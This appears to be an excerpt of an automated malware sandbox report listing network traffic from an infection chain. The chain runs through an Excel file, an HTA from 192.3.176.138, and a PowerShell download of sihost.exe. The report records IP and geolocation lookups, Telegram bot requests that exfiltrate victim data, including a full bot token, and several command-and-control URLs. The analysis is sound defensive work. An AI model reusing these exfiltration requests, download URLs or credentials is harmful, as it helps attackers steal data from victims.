                        Source: global trafficHTTP traffic detected: GET /JkAPbL HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: exi.linkConnection: Keep-AliveCookie: short_3115571=1
                        Source: global trafficHTTP traffic detected: GET /xampp/sop/40.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.138Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xampp/sop/40.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.138Connection: Keep-AliveRange: bytes=8897-If-Range: "14b8e-61f91eb4fa2a5"
                        Source: global trafficHTTP traffic detected: GET /40/sihost.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.138Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49167 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49180 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49180 version: TLS 1.0
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.138
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89437018 URLDownloadToFileW,7_2_000007FE89437018
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F860BC8.emfJump to behavior
                        Source: global trafficHTTP traffic detected: GET /JkAPbL HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: exi.linkConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /JkAPbL HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: exi.linkConnection: Keep-AliveCookie: short_3115571=1
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%208/14/2024%20/%207:15:53%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%208/15/2024%20/%207:26:06%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xampp/sop/40.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.138Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xampp/sop/40.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.138Connection: Keep-AliveRange: bytes=8897-If-Range: "14b8e-61f91eb4fa2a5"
                        Source: global trafficHTTP traffic detected: GET /40/sihost.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.138Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                        Source: global trafficDNS traffic detected: DNS query: exi.link
                        Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                        Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                        Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                        Source: unknownHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbd929eb213d3Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 13 Aug 2024 18:25:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 13 Aug 2024 18:25:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                        Source: mshta.exe, 00000004.00000002.417101402.0000000003932000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.0000000003932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/
                        Source: powershell.exe, 00000007.00000002.438678228.0000000002876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/40/sihost.e
                        Source: powershell.exe, 00000007.00000002.452900071.000000001C3A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/40/sihost.exe
                        Source: powershell.exe, 00000007.00000002.438678228.0000000002876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/40/sihost.exep
                        Source: mshta.exe, 00000004.00000002.417101402.0000000003932000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.0000000003932000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/_
                        Source: mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/xampp/sop/40.hta
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/xampp/sop/40.hta...
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/xampp/sop/40.hta...se
                        Source: mshta.exe, 00000004.00000003.414459456.0000000000194000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416265424.0000000000184000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416776034.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/xampp/sop/40.hta06
                        Source: mshta.exe, 00000004.00000003.414459456.0000000000194000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416265424.0000000000184000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416776034.0000000000185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/xampp/sop/40.htaC:
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/xampp/sop/40.htaJ6
                        Source: mshta.exe, 00000004.00000003.416161559.00000000023F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/xampp/sop/40.htahttp://192.3.176.138/xampp/sop/40.htaP
                        Source: mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/xampp/sop/40.htalent%
                        Source: mshta.exe, 00000004.00000003.416265424.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414459456.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416776034.00000000001A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/xampp/sop/40.htat
                        Source: mshta.exe, 00000004.00000003.416161559.00000000023FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.138/xampp/sop/40.htax
                        Source: sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                        Source: sihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                        Source: sihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                        Source: sihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                        Source: sihost.exe, 00000011.00000002.625935756.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002854000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                        Source: sihost.exe, 00000011.00000002.625935756.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000282C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002733000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000281E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002934000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
